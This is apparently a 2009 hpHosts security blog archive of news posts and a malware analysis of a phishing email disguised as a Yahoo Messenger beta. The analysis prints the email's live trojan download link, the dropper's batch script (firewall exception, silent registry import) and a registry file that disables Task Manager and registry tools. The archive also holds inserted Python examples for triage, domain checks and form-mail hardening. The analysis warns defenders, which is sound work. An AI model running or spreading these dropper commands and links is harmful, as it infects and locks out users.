Blog for hpHosts, and whatever else I feel like writing about ....

Thursday, 30 April 2009

hpHosts: New feature for you :o)

I am happy to announce, there is now a new feature for you ladies and gents to play with;

http://hosts-file.net/?s=History

This option is listed under the menu as "History" and, in short, provides the same view as "Browse Database" with one exception: it lists ALL IP changes that have been recorded, for all hosts, regardless of whether or not the host is listed in the hpHosts database.

I was hoping to have introduced this last week, but am still fighting off an infection, so things are going a lot slower than I'd like.

In any case, have a play and let me know what you think.

Spambot Search Tool v0.29 - Recommended update

I was notified earlier of a bug in the sGB service, that prevented everyone posting comments to the guestbooks. A little checking showed the issue to actually be caused by a bug in the Spambot Search Tool, used to filter and block spammers.

This issue has now been fixed, and v0.29 released as a recommended update.

As an aside, I've also updated the System Requirements page for this product.

Homepage
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Download
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Wednesday, 29 April 2009

Opera: 15 years old!

I never used to use Opera until it stopped being adware, and since then, have become somewhat of a fan of it (though I still don't use it full time as it doesn't use the MenuExt reg key, so doesn't support my AB Extension Pack).

It is with great pleasure therefore, that I announce Opera's 15th anniversary. Opera is without a doubt, one of the best browsers available, beating the pants off of Firefox, Chrome, IE and just about everything else.

Happy birthday Opera - and here's to many more!

Celebrating 15 years of browser innovation
http://www.opera.com/portal/15/

Cloud Antivirus - Yay or nay?

Panda have never been very good when it came to non-bloat, and more so when it came to having good detections. Now however, Panda are offering a beta of their "Cloud Antivirus" - could this spell an end to the bloat, and finally a major upgrade to their detection rate? Time will tell.

Here's my first bit of feedback after visiting the website they've dedicated to it though - GET RID OF THE DAMN JAVASCRIPT REQUIREMENT! Contrary to popular belief, some of us prefer to have this disabled, and a security company should be advocating keeping it disabled, instead of making the site utterly useless until it is enabled (not even the feedback option works!).

Server based antivirus is actually nothing new, contrary to their claims - most corporate networks already have something similar, consisting of a server that hosts the bulk of the antivirus, and clients that simply check the server for updates, configuration settings and what not. However, as long as they drastically improve their detection rates, this could actually be something useful, again - time will tell.

In the meantime, if you like beta testing, then give it a run and let us know how it does.

Homepage:
www.cloudantivirus.com

Blog
http://research.pandasecurity.com/archive/Panda-Cloud-Antivirus-_2D00_-Free-AV-thin_2D00_client.aspx

Kudos to Donna at Calendar of Updates, for the heads up :o)

/edit

Oh how I must laugh - thin client? the download is 18MB! (and that's just the installer!)

Zlkon.lv disconnected - but apparently not completely gone

I was happy to read over at Malware Domain List this morning, that Zlkon.lv had apparently been disconnected. Obviously I had to see where the domains listed in hpHosts, that pointed to zlkon, had now gone to. The results were interesting, but we'll get to that in a second.

I checked the AS report, as referenced in the MDL thread, and indeed it did seem as though Zlkon had gone;

http://www.cidr-report.org/cgi-bin/as-report?as=AS12553

Checking via BGPlay for the dates 28-04-2009 - 29-04-2009 shows;

This shows their upstream as;

http://www.cidr-report.org/cgi-bin/as-report?as=AS5518

If we expand the dates a little, we see that indeed, a lot of the previous routes seem to have now gone as of 06:42 yesterday;

As mentioned, I ran the domains listed in hpHosts, that previously resolved to Zlkon.lv IP space, to see where they now resolved to, and the results showed;

95.129.144.210 - NET-VENTREX (UK)
88.80.19.237 - SE-PRQ-20051124 (Sweden)
91.212.65.35 - EUROHOST-NET (Ukraine)
78.26.179.253 - RENOME-SERVICE (Ukraine)
78.129.192.17 - RapidSwitch (UK)
78.129.166.5 - RapidSwitch (Cayman Islands)
77.222.40.234 - SpaceWeb (Russia)
64.191.12.38 - Zlathosting.ru (US)
213.163.91.93 - SERVERBOOST (Netherlands)
211.95.73.189 - UNICOM (China)
203.169.164.18 - HKNET-H (Hong Kong)
195.88.81.37 - ECOWEB (Latvia)
194.247.192.180 - EUNET-YU (Serbia)

Interestingly however, quite a few of them are still resolving to the Zlkon IP space, and are seemingly still active. This means either Zlkon is still in the process of being taken down, or has found a new upstream provider already.
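The check described above (re-resolve every domain that used to sit in the disconnected provider's space and see where it landed) is easy to script. The following is an added example, not code from the hpHosts project: it takes a snapshot of current resolutions and splits it into "still in the old prefixes", "moved elsewhere (grouped by netname)" and "no longer resolves". The post does not list Zlkon's actual prefixes, so the OLD_PREFIXES values are documentation (TEST-NET) blocks standing in for them, and the domain names in SNAPSHOT are placeholders; the netnames for the moved entries are the ones reported in the post.

```python
import ipaddress
from collections import defaultdict

# Constructed stand-in for the prefixes the disconnected AS used to announce. The post
# does not list Zlkon's actual ranges, so documentation (TEST-NET) blocks are used here.
OLD_PREFIXES = [ipaddress.ip_network(p) for p in ("192.0.2.0/24", "198.51.100.0/24")]

# Constructed snapshot of "domain -> (current A record, netname)" as a checker would
# record it after the disconnection. Domain names are placeholders; a None record
# means the name no longer resolves.
SNAPSHOT = {
    "moved-a.invalid": ("95.129.144.210", "NET-VENTREX (UK)"),
    "moved-b.invalid": ("88.80.19.237", "SE-PRQ-20051124 (Sweden)"),
    "moved-c.invalid": ("78.129.192.17", "RapidSwitch (UK)"),
    "moved-d.invalid": ("78.129.166.5", "RapidSwitch (Cayman Islands)"),
    "stayed-a.invalid": ("192.0.2.17", "old upstream"),
    "stayed-b.invalid": ("198.51.100.9", "old upstream"),
    "gone-a.invalid": (None, None),
}


def classify(snapshot, old_prefixes):
    """Split a resolution snapshot into domains still inside the old prefixes, domains
    that moved (grouped by the netname of their new IP), and domains that no longer
    resolve. Iteration is sorted so the output is deterministic."""
    still_old, moved, dead = [], defaultdict(list), []
    for domain, (ip_text, netname) in sorted(snapshot.items()):
        if ip_text is None:
            dead.append(domain)
            continue
        ip = ipaddress.ip_address(ip_text)
        if any(ip in net for net in old_prefixes):
            still_old.append((domain, ip_text))
        else:
            moved[netname].append((domain, ip_text))
    return still_old, dict(moved), dead


def summary(snapshot=SNAPSHOT, old_prefixes=OLD_PREFIXES):
    """Human-readable report: where did the domains go, and how many still sit in the
    old space (the part of a takedown that is not finished yet)."""
    still_old, moved, dead = classify(snapshot, old_prefixes)
    lines = [f"{len(still_old)} still resolve into the old IP space:"]
    lines += [f"  {d} -> {ip}" for d, ip in still_old]
    lines.append(f"{sum(len(v) for v in moved.values())} moved elsewhere:")
    for netname in sorted(moved):
        lines += [f"  {d} -> {ip} ({netname})" for d, ip in moved[netname]]
    lines.append(f"{len(dead)} no longer resolve: {', '.join(dead)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(summary())
```

For a live run, SNAPSHOT would be filled from socket.gethostbyname (or a resolver library) against the hpHosts export, and OLD_PREFIXES from the AS's prefix list in the CIDR report the post links; the classification logic itself does not change.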

See the full results, as of two hours ago;

http://hosts-file.net/misc/zlkon.lv.html

I'm surprised somewhat, that the mainstream tech media hasn't already picked this up, but alas it seems this is certainly the case (or at least, if they have, I've not seen any stories concerning it on any of the RSS feeds I monitor).

Either way, this is great news for us, and is hopefully an end to what is without doubt, one of the worst offenders in the world of malware.

If you've got something to add, or just fancy joining in the discussion, feel free to join us over at the MDL forums;

http://www.malwaredomainlist.com/forums

Tuesday, 28 April 2009

BitDefender joins the list of companies not to trust .....

Stupid question I know, it's all about the money - but what ever happened to security products err, protecting users instead of selling them out?

http://msmvps.com/blogs/donna/archive/2009/04/28/bitdefender-partners-with-ask-com-also.aspx

hpHosts mirror and vURL Online bug fix

I'm happy to announce, courtesy of the wonderful ladies and gents at CoU (Calendar of Updates), we've now got an additional download mirror for the hpHosts files.

I am planning on converting the entire site to MySQL/PHP, so it can be moved to a Linux host, but that's going to take some time due to health and personal issues.

As an aside, I was made aware a couple of days ago of a problem with the Montana Menagerie server that is used by vURL Online. It turns out the URL it had been given was using a redirect, so the server failed to return the results. I've now changed it to the correct URL, so this issue is now resolved.

If you'd like to help spread vURL, by providing a proxy mirror for use by the service, the script is now available at;

http://vurl.mysteryfcm.co.uk/?mode=FAQ#vurlhelp

All your server needs is PHP + cURL!

StopBadware delists Ascentive (y'know, the folks responsible for FinallyFast)

From the desk of "wtf are they smoking down there", comes yet another completely stupid move by StopBadware;

StopBadware.org delists Ascentive as Badware
http://msmvps.com/blogs/donna/archive/2009/04/28/stopbadware-org-delists-ascentive-as-badware.aspx

Wonder who they'll delist next? Zango? Zlkon? or all of the loverly botnets perhaps?

Sunday, 26 April 2009

YouTube promoting Zango via mygamesfile.com!

I already knew Zango weren't gone for good, contrary to popular belief, as ZangoCash (a favourite amongst the PPI (pay per install) crowd) is still very much online. However, I wasn't expecting this;

http://www.malwaredomainlist.com/forums/index.php?topic=2777

As shown by JohnC (Malware Domain List), this clearly shows Zango being peddled courtesy of a video on YouTube, that's been posted by mygamesfile.com (congrats to those running MGF - you've now been added to hpHosts - we don't like malware, which is exactly what Zango is).

Is this a one off? I doubt it. Is YouTube directly involved? I doubt it - but it shows yet again that sites that allow user content to go unchecked are always going to lead to trouble.

References

YouTube Promotes Zango Software
http://www.malwaredomainlist.com/forums/index.php?topic=2777

ZANGO-R.I.P.----FINALLY!!!
http://temerc.com/forums/viewtopic.php?p=3437553#p3437553

Notorious adware vendor Zango shuts its doors
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9131858&intsrc=news_ts_head

You Get What You Pay For
http://blog.spywareguide.com/2009/04/you-get-what-you-pay-for.html

Zango installers pushed via Twitter
http://blog.spywareguide.com/2009/04/zango-installers-pushed-via-tw.html

Download Zango, Get Free PC Games (Sort Of)
http://blog.spywareguide.com/2009/02/download-zango-get-free-pc-gam.html

Lots more Zango beatdown goodness by The Goddamn Batman
http://blog.spywareguide.com/mt-search.cgi?tag=Zango&blog_id=4&IncludeBlogs=4

Softpedia delisted Comodo

This is indeed happy news, even if it wasn't their choice. Alas Comodo don't seem to understand the concept of adware/spyware, so let's spell it out for them - ASK IS SPYWARE, SAFE SURF IS ADWARE! (and trying to bully those that let others know about this, isn't going to win you any points, quite the opposite).

Well, if you had searched Softpedia for Comodo in the past week, you would have surely noticed that the company’s flagship programs were no longer listed on Softpedia. This was not our decision, of course, but let’s start with the beginning.

On April 15th, Softpedia received an official cease and desist letter from the Comodo PR team requesting us to "discontinue all references on Softpedia identifying CIS as adware" within seven days, because Comodo Internet Security is not adware.

The first thing we did was, of course, to double-check the license, but, as we’ve tried explaining to the Comodo team, CIS is indeed adware. Why? Well, for starters, because the installer attempts to change both the browser’s homepage and search engine. As if that wasn’t a good enough reason, the setup also offers to install SafeSurf. Here’s what the official Comodo letter states: "SafeSurf is optional and does not display unsolicited advertisements on a user’s computer, nor does it hijack browser settings or perform search overriding or home page changing without the user’s consent."

Aside from the fact that SafeSurf is a component that the program (CIS) does not require to fully function, therefore it alone would be a good reason to mark CIS as adware, this utility also installs Ask Toolbar without asking for the user’s permission. This type of behavior is clearly not the one described in the Comodo email and could be easily classified as spyware (since adware would imply prior user consent).

And so, after double-checking the award, we’ve replied to the Comodo email and tried explaining all of the above. Moreover, we’ve reminded them of the program’s popularity on Softpedia and its high rating from both users and our reviewers. And last, but not least, before requesting a confirmation email, we’ve underlined the fact that changing the adware components in the setup process from checked-by-default to unchecked will solve the problem without removing them from the installation.

We’ve also posted our email on Comodo’s community forums, explaining our actions to the software’s users and, because we would prefer to keep CIS on Softpedia, we’ve even offered options to the PR team. As expected, most Comodo users shared our view and disapproved of the inclusion of the components in question.

Unfortunately, neither we nor the community seem to have had any influence on the Comodo team. A week later nothing changed and, as our deadline was near and the Comodo PR team did not send us any reply to our email, we’ve decided we had no other option but to remove the listing.


http://news.softpedia.com/news/Comodo-Software-Removed-From-Softpedia-110169.shtml

Agnitum offering (limited) Outpost for free

Yep, you read right, it's limited, as shown by the comparison. However, Outpost is still one of the best Windows firewalls available, and beats the pants off of the built in firewall that Windows comes with, so grab it asap.

http://download.cnet.com/Agnitum-Outpost-Firewall/3000-10435_4-10913746.html

The official page for it is at the following URL, but none of the download links/buttons worked when I tried it.

http://free.agnitum.com/

Kudos to Donna @ CoU for the heads up who says;

It’s been years since Agnitum started offering a free version of their firewall, but it never had program updates. Today, I learned in the Outpost and Wilders discussion forums that Agnitum is offering the 2009 edition of Outpost firewall for free. It’s a simple but effective firewall. No web control. Just a firewall, self-protection and Host Protection.


http://msmvps.com/blogs/donna/archive/2009/04/26/nice-move-agnitum-for-providing-new-version-of-your-free-firewall.aspx?CommentPosted=true#commentmessage

Saturday, 25 April 2009

Full Circle Magazine: Issue 24

Full Circle - the independent magazine for the Ubuntu Linux community
are proud to announce the release of our twenty-fourth issue.

This month: It's our birthday!

... and a redesign! *gasp!*

* Command and Conquer - Cron.
* How-To : Program in C - Part 8, Create a MAME Machine,
and Spreading Ubuntu - Part 3 and Inkscape - Part 1.
* My Story - Great-grandma Goes Shopping and Chinese Translations
* Book Review - Ubuntu Unleashed, three copies up for grabs!
* MOTU Interview - James Westby
* Top 10 - Best of Top5, 2007-'09
* PLUS: all the usual goodness, doubled!

Read more
http://fullcirclemagazine.org/2009/04/25/full-circle-magazine-issue-24-released-to-an-unsuspecting-public/

Get it while it's hot!
http://fullcirclemagazine.org/issue-24/

Issues 0 - Current
http://fullcirclemagazine.org/downloads/

Forums:
http://ubuntuforums.org/forumdisplay.php?f=270

Wiki:
http://wiki.ubuntu.com/UbuntuMagazine

Friday, 24 April 2009

Email Alert: IRC Trojan disguised as Yahoo Messenger Beta 9.4

I received the following e-mail a few minutes ago;

Yahoo! Messenger <http://messenger.yahoo.com>

Preview the new
Yahoo! Messenger for Vista™


The new messenger Vista 9.3 now works on Windows XP too. Download Now <http://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe>

Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <http://new.groups.yahoo.com/ymessenger_for_vista/join>

We need your help to improve the product.
» Send feedback <http://feedback.help.yahoo.com/feedback.php?.src=MSNGRVISTA&.from=web>
See Yahoo! Messenger for Vista in action.
» Watch the video preview

Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).

See what's in store...

* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling

©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.

Copyright © 2008 Yahoo! Inc. <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=0/SIG=10np9vmbm/*http://www.yahoo.com/> All rights reserved. Privacy Policy <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=1/SIG=11b8diacl/*http://privacy.yahoo.com/privacy/us/mesg/> - Terms of Service <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=2/SIG=1136qnvkg/*http://docs.yahoo.com/info/terms/> - Copyright/IP Policy <http://us.ard.yahoo.com/SIG=14t> - Help <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=4/SIG=119174mfa/*http://help.yahoo.com/help/us/messenger>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13ulcavcq%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d431143132%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=129gtep8a%2fN%3dy0jjD9j8a4Q-%2fC%3d-1%2fD%3dFSRVY%2fB%3d-1>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13upbop04%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d671435333%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=139fpoc2d%2fN%3dyUjjD9j8a4Q-%2fC%3d224039.2026165.3499947.1964914%2fD%3dFOOT%2fB%3d1058397>


The link it points to for the download;

hxxp://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe

... leads to an IP in China. If we scan the file with VirusTotal, we see it's an IRC trojan.

http://www.virustotal.com/analisis/a9e91000bd66003d3871e28c92b51a3b

Extracting the file shows it claiming to be a .DLL by the name of fp721ext.dll. This "DLL", however, is actually a folder, and contains the files shown in the following screenshot;

As you can see, there are quite a few in there. mIRC itself, a legitimate IRC client, has been renamed mircrosoft.exe. The folder also contains a file called csc.cmd. Amongst other things, this adds an exception to the Windows firewall, allowing mircrosoft.exe to connect to the attacker's IRC channel without warning you;

@echo off

@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg

@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"

@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE

@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe

EXIT


regis.reg contains the following;

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a

[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1201460626,0"

[HKEY_CURRENT_USER\Software\mIRC\License]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"

[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"

[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001


anyssya.jpg actually is a JPG file, and its detection at VT is non-existent. However, since it's also loaded by the csc.cmd file, I'm betting it's a little more than it seems.
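The csc.cmd and regis.reg contents above are the kind of dropper artefacts worth triaging automatically rather than by eye. The following is an added example, not code from the original post or from any product mentioned on it: a small parser for REGEDIT4-style .reg text plus a line scanner for .cmd files, run over the two files quoted above (embedded inline as the sample input). It flags the Windows policy lockdowns (DisableRegistryTools, DisableTaskMgr, NoTrayItemsDisplay and so on) being switched on, the mIRC configuration being pre-seeded, the silent registry import, the firewall exception, and a non-executable file being launched with START. The list of policy value names and of "non-executable" extensions is an assumption chosen for this sample, not a complete catalogue.

```python
import re

# The csc.cmd quoted in the post, embedded here as sample input for the scanner.
CSC_CMD = r"""@echo off
@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg
@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"
@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE
@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe
EXIT
"""

# The regis.reg quoted in the post, embedded here as sample input for the parser.
REGIS_REG = r"""REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a

[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1201460626,0"

[HKEY_CURRENT_USER\Software\mIRC\License]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"

[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"

[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="17904-1848536"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001
"""

# Policy values that, when non-zero, take tools away from the user (assumed list).
POLICY_FLAGS = {"DisableRegistryTools", "DisableTaskMgr", "NoTrayItemsDisplay",
                "ClearRecentDocsOnExit", "NoDriveTypeAutoRun"}
# Extensions that should never be the target of START in a dropper script (assumed list).
NON_EXEC_EXT = (".jpg", ".jpeg", ".gif", ".png", ".txt", ".ini")


def parse_reg(text):
    """Parse REGEDIT4-style text into (key, value_name, raw_value) triples.
    '@' is the key's default value, as in the format itself."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("REGEDIT"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^(@|"([^"]*)")=(.*)$', line)
        if m and key is not None:
            name = "@" if m.group(1) == "@" else m.group(2)
            entries.append((key, name, m.group(3)))
    return entries


def decode_value(raw):
    """Turn dword:/hex:/"string" raw values into int / bytes / str."""
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith("hex:"):
        return bytes(int(b, 16) for b in raw[4:].split(",") if b)
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    return raw


def triage_reg(text):
    """Flag policy lockdowns being enabled and mIRC settings being pre-seeded."""
    findings = []
    for key, name, raw in parse_reg(text):
        value = decode_value(raw)
        if "\\Policies\\" in key and name in POLICY_FLAGS:
            # hex: values are little-endian DWORDs; anything non-zero enables the policy
            as_int = int.from_bytes(value, "little") if isinstance(value, bytes) else value
            if isinstance(as_int, int) and as_int:
                findings.append(f"policy lockdown: {name}={as_int:#x} under {key}")
        if key.lower().startswith("hkey_current_user\\software\\mirc\\"):
            findings.append(f"mIRC config seeded: {key.rsplit(chr(92), 1)[-1]}={value!r}")
    return findings


def triage_cmd(text):
    """Flag firewall exceptions, silent .reg imports and suspicious START targets."""
    findings = []
    for line in text.splitlines():
        line = line.strip().lstrip("@")
        m = re.search(r"netsh\s+firewall\s+add\s+allowedprogram\s+(\S+)", line, re.I)
        if m:
            findings.append(f"firewall exception added for {m.group(1)}")
        m = re.search(r'regedit\s+/s\s+"?([^"\s]+)"?', line, re.I)
        if m:
            findings.append(f"silent registry import of {m.group(1)}")
        m = re.match(r"START(?:\s+/\S+)*\s+(\S+)", line, re.I)
        if m:
            target = m.group(1)
            if target.lower().endswith(NON_EXEC_EXT):
                findings.append(f"START of non-executable file {target}")
            elif target.lower().endswith(".exe"):
                findings.append(f"launches {target}")
    return findings


if __name__ == "__main__":
    for f in triage_cmd(CSC_CMD) + triage_reg(REGIS_REG):
        print(f)
```

The "START of non-executable file" finding is the hook for exactly the suspicion raised about anyssya.jpg: a script that opens a picture during installation deserves a second look at the picture.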

The infection, judging by the .ini files, seems to connect to 89.35.207.106 (client-8935207106.raknetsoft.ro).

I'll post further analysis once complete. In the meantime, the e-mail itself originated from 66.51.252.238 (Velcom (ADSL) NET-VELCOM-DSL-1) and had the following properties;

From: Yahoo! Vista
E-mail:vista-yahoo.com@trixbox1.localdomain [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !

members.freewebs.com added to hpHosts

Whilst free hosting services are normally not included, I've decided to include members.freewebs.com in hpHosts. The reason for this is that their mail processor (members.freewebs.com/formMail.jsp) is being used in a rash of Citibank phishing scams, and reports to them concerning this have gone completely ignored.

Until they lock down their form processor to prevent this, I felt it best to blacklist them.
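A hosted form-mail processor becomes a phishing drop box when the request itself may name the recipient. As an added example (not freewebs' code, whose handler is not shown on the page), here is the weak pattern beside a locked-down one in which the recipient and subject are bound server-side to a form id the site owner registered, only allowlisted fields are accepted, and header-injection characters are refused. FORM_REGISTRY, the field names and the FormMailError type are constructed for this example.

```python
import re

# Constructed server-side registry: the destination address belongs to the form id,
# so no request parameter can redirect a submission somewhere else.
FORM_REGISTRY = {
    "contact-42": {
        "to": "owner@example.com",
        "subject": "Site contact form",
        "fields": ("name", "email", "message"),
    },
}

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class FormMailError(ValueError):
    """Raised for any submission the locked-down handler refuses to relay."""


def open_relay_handler(params):
    """The pattern that makes a hosted form processor abusable: recipient, subject
    and body all come from the request. Included only to contrast with the version
    below; it is the behaviour the post is complaining about."""
    return {"to": params["recipient"], "subject": params.get("subject", ""),
            "body": params.get("message", "")}


def locked_down_handler(form_id, params, registry=FORM_REGISTRY):
    """Relay only to the registered owner of form_id, accept only its allowlisted
    fields, and reject line breaks that could smuggle extra mail headers."""
    form = registry.get(form_id)
    if form is None:
        raise FormMailError("unknown form id")
    unexpected = set(params) - set(form["fields"])
    if unexpected:
        raise FormMailError(f"unexpected fields: {sorted(unexpected)}")
    for name, value in params.items():
        if name != "message" and re.search(r"[\r\n]", value):
            raise FormMailError(f"line break in single-line field {name}")
    if "email" in params and not EMAIL_RE.match(params["email"]):
        raise FormMailError("malformed reply address")
    body = "\n".join(f"{k}: {params.get(k, '')}" for k in form["fields"])
    return {"to": form["to"], "subject": form["subject"], "body": body}


if __name__ == "__main__":
    ok = locked_down_handler("contact-42",
                             {"name": "Alice", "email": "alice@example.org", "message": "hello"})
    print(ok["to"], "<-", ok["body"].replace("\n", " | "))
```

Whether the message is actually sent is left to the caller; the point is that the returned dictionary can never carry a recipient that did not come from the registry.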

Phishtank submission:
http://www.phishtank.com/phish_detail.php?phish_id=689769

Incidentally, anyone else notice that PhishTank has started including legit links when submitting phishing e-mails to them? (*.abbeynational.co.uk, *.citibank.com etc etc) I thought it was meant to be parsing those out .... certainly used to.

http://www.phishtank.com/user.php?username=mysteryfcm

NOD32 flagging hpHosts as Win32/Qhost trojan

I noticed this myself yesterday whilst working on an update, and just ignored it. However, a little looking up has shown the following;

http://www.wilderssecurity.com/showthread.php?p=1453375

I've checked it again now that NOD has updated, and the F/P has thankfully been corrected. I am however, a little confused as to why blocking ThePirateBay.org, would result in NOD thinking the hpHosts file was a trojan .....

Incidentally, I've had queries before concerning torrent sites being listed in hpHosts, and as I've said before, whilst there are legit uses for torrents (e.g. Linux distros), the vast majority of torrents that I've come across, have been malware. Until the ladies and gents that run these types of sites, start removing those infected with malware, the sites will remain in hpHosts.

Jackass of the week

... and the award for jackass of the week goes to;

http://spywarewarrior.com/viewtopic.php?t=30667

Thursday, 23 April 2009

The BillP WinPatrol Story

As a member of the security community I’ve had the honor to work with volunteers who spend countless hours helping users decipher hijack logs. I’ve had the pleasure of sharing data with AntiSpyware crusaders who pore over millions of bytes of captured data proving how reputable companies were encouraging invasive adware popups. I’ve reverse engineered malware attacks tracing their roots to countries whose governments turn a blind eye to criminal activities. I’ve been threatened, received cease & desist orders from lawyers and offered big bucks to join the dark side.

I’m now happy to write and share my experience with others. I hope that my insights into the ever changing consumer technology industry may be valuable to others and encourage their thoughts and imagination. I don’t expect everyone to agree with everything I write, but I continue to consider myself lucky if I can spark new innovative thoughts from my readers.


Read the full article
http://billpstudios.blogspot.com/2009/04/billp-winpatrol-story.html

Hexzone, RansomWare and, Finjan

Hexzone coincidentally caught my attention while I was gathering material for my recent article about some emerging ransomware. Hexzone has recently been seen downloading Trojan.Ransomlock, which blocks the user's access to all Windows resources and asks the victim for money (ransom) in return for unlocking their system. For details please refer to Ransomware on the loose..

In this post, I will try to shed light on some missing details about Hexzone. Then I will show Hexzone's relationship with some other known malware, and in the end I will discuss my thoughts on the size of this un-named botnet.

Here is my initial analysis of the Hexzone sample mentioned in Finjan's report. Normally Hexzone resides on the victim machine in the form of a 'Browser Helper Object'. The reason it injects itself into the browser as a plug-in is to hijack the user's browsing sessions in order to blackmail them. Here is how it happens: as the user tries to browse any web page from the infected PC, this plug-in leads the user to a fake page, displaying porn contents. Along with porn contents a message is displayed in the Russian language.

Translated from Russian:

"to delete (porn contents) select country and sends code 3981134 to room number (different for each country)."

As I explained in my last article, these SMS codes use paid "rooms". These "rooms" have a concept like 1900 numbers where it costs money to phone in. Every time someone sends an SMS to one of these rooms, a fixed amount of money is deducted from the sender's balance and it gets transferred to the owner of the room.

Another shocking fact was that this page listed seven country names along with corresponding SMS room numbers. Our initial observation that this SMS based ransom is only being used within Russia no longer holds true.


Read the full article
http://blog.fireeye.com/research/2009/04/hexzone-ransomware-and-finjan.html

Wednesday, 22 April 2009

Spambot Search Tool v0.28

Version: 0.28

* Fixed MySQL database/tables/fields not created
* Fixed sPHPAPI missing $ in a couple places

Special thanks to DrDrrae (www.drdrrae.com)

Download:
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Saturday, 18 April 2009

hpHOSTS - UPDATED April 18th, 2009


The hpHOSTS Hosts file has been updated. There is now a total of 60,302 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 18/04/2009 13:19
  2. Last Verified: 18/04/2009 12:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Thursday, 16 April 2009

sGB Update: Dutch translation added!

I am happy to report, with special thanks to Joris, the sGB site can now be viewed in Dutch by your guestbooks' visitors. As an example;

http://guestbook.it-mate.co.uk/users/MysteryFCM/?lng=1

You can change the language via the top right hand corner. If you'd like to help me add additional translations, please do contact me!

Saturday, 11 April 2009

SupportOnClick update

